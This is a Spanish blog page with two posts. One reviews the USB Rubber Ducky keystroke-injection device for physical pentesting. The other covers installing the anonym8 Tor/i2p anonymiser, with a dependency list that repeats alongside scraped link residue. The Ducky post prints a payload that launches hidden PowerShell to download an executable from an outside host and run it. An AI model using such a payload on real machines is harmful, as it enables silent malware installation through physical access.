viernes, 17 de marzo de 2017

USB Rubber Ducky, un teclado malicioso para pruebas de pentesting físico

Hace una semana me llegó a casa mi nuevo USB Rubber Ducky y estos días he estado jugando un poco con él, a continuación os explicaré mis impresiones y os diré cosas que tener en cuenta a la hora de usarlo así como donde comprarlo y os liberaré unos cuando payloads para poder hacer pruebas con el. 


Este USB simula ser un teclado así, los PC's lo reconocerán como un dispositivo de confianza y así poder aplicar payloads sin ningún tipo de sospecha del ordenador en cuestión. Usa un lenguaje propio muy sencillo de comprender. Entre sus características encontramos:
  • Es exactamente igual que una unidad USB Flashdrive lo que hace confiar al usuario a la hora de realizar la ingeniería social
  • Viene con un lector de tarjetas SD para poder cargar los payloads 
  • Escribe 1000 palaras por segundo lo que hará que en poco más de 6 segundos tengamos toda la información de un PC en el simple gesto de enchufar desenchufar 
  • Viene con un led que nos avisa si el Payload esta bien configurado para funcionar o por el contrario tendremos que agregar más argumentos para hacerlo funcional
  • Tiene un botón para cargar los Payloads por si con el simple gesto de enchfa y desenchufar no basta 
Una cosa también importante es el hecho de que viene con una tarjeta micro SD de 128 MB para poder cargar los payloads, tamaño más que suficiente si lo único que queremos es cargar la información de el PC (siempre que no sea demasiado grande) en el caso contrario deberíamos agregarle otra tarjeta de más tamaño.

Su lenguaje como he dicho es la mar de sencillo, con estos sencillos comandos podremos utilizarlo para lo que queramos:
  • DEFAULT_DELAY o DEFAULTDELAY, esto es para definir los milisegundos que tardará en ejecutar las órdenes
  • DELAY, lo mismo pero personalizado 
  • STRING
  • Y por última las keys especiales para cada sistema, para ello deberemos conocer los comandos del terminal del sistema en cuestión. 
Aquí os mostraré un ejemplo de como descargar y ejecutar un archivo al azar:

GUI R 
DELAY 100
STRING powershell -windowstyle hidden
(new-object
System.Net.Web.client).DownloadFile('http://example.com/bob.old',%TEMP%\bob.exe;Start-Process
"%TEMP%/bob.exe"
ENTER

Así es como lo haríamos, a continuación os pondré un series de Payloads preconfigurados para que podáis jugar con vuestros Rubber Ducky.
Y para finalizar os mostraré donde comprar un USB Rubber Ducky

->  https://hakshop.com/products/usb-rubber-ducky-deluxe

Y por si no queréis pagar semejante burrada por un Rubber Ducky aquí os dejo un post antiguo donde explico como montarlo tu mismo por 3$

-> http://www.jarlinx.com/2017/01/como-montar-un-usb-rubber-ducky-por-3.html 

___________________________________________________________________

Fuentes
___________________________________________________________________

http://picateshackz.com/2016/02/list-of-top-rubber-ducky-usb-payloads.html

sábado, 25 de febrero de 2017

Utilizar anonym8 una herramienta para automatizar la navegación sobre la red Tor y i2p

En este artículo os explicaré como instalar y configurar anonym8 para navegar sobre proxys anónimos. 



Anonym8 es un automatizador para la red Tor y i2p que nos permite con una siemple configuración asegurar casi al 100% nuestro anonimato en la red. Para usarlo solo tendremos que ir al enlace oficial de Github.

[Nota: es un programa para Linux, para Win o Mac Os hay otras alternativas]

-> anonym8

Esta herramienta tiene una serie de dependecias para poder funcionar aquí os las dejo:
  • Tor
  • macchanger
  • resolvconf
  • dnsmasq
  • polipo
  • privoxy
  • arm
  • libnotify
  • curl
  • bleachbit
No nos preocuparemos por instalarlas ya que el programa las descarga solas pero si hay algún tipo de error aquí las tenéis enumeradas para que podáis encontrar ese error.

En siguiente paso será instalar el programa, con el archivo .zip previamente descargado procederemos a acceder a la ruta o directorio donde hemos guardado nuestro programa como es clásico con un simple
cd Escritorio/
Y a continuación le daremos permisos de ejecución
chmod +x INSTALL.sh
Y después lo ejecutamos
bash INSTALL.sh
Una vez instalado podremos navegar por las redes Tor y ip2 con total facilidad.

Aquí os dejo unos apuntes para que podáis guiaros por el programa.

-> pastebin.com/PJs0AuAy






  • Tor
  • macchanger
  • resolvconf
  • dnsmasq
  • polipo
  • privoxy
  • arm
  • libnotify
  • curl
  • bleachbit
  • - See more at: https://www.redeszone.net/2016/10/12/conoce-anonym8-una-herramienta-automatizar-proxy-transparente-navegar-traves-tor-redes-i2p/?utm_source=related_posts&utm_medium=widget#sthash.eLBrxYr2.dpuf






  • Tor
  • macchanger
  • resolvconf
  • dnsmasq
  • polipo
  • privoxy
  • arm
  • libnotify
  • curl
  • bleachbit
  • - See more at: https://www.redeszone.net/2016/10/12/conoce-anonym8-una-herramienta-automatizar-proxy-transparente-navegar-traves-tor-redes-i2p/?utm_source=related_posts&utm_medium=widget#sthash.eLBrxYr2.dpuf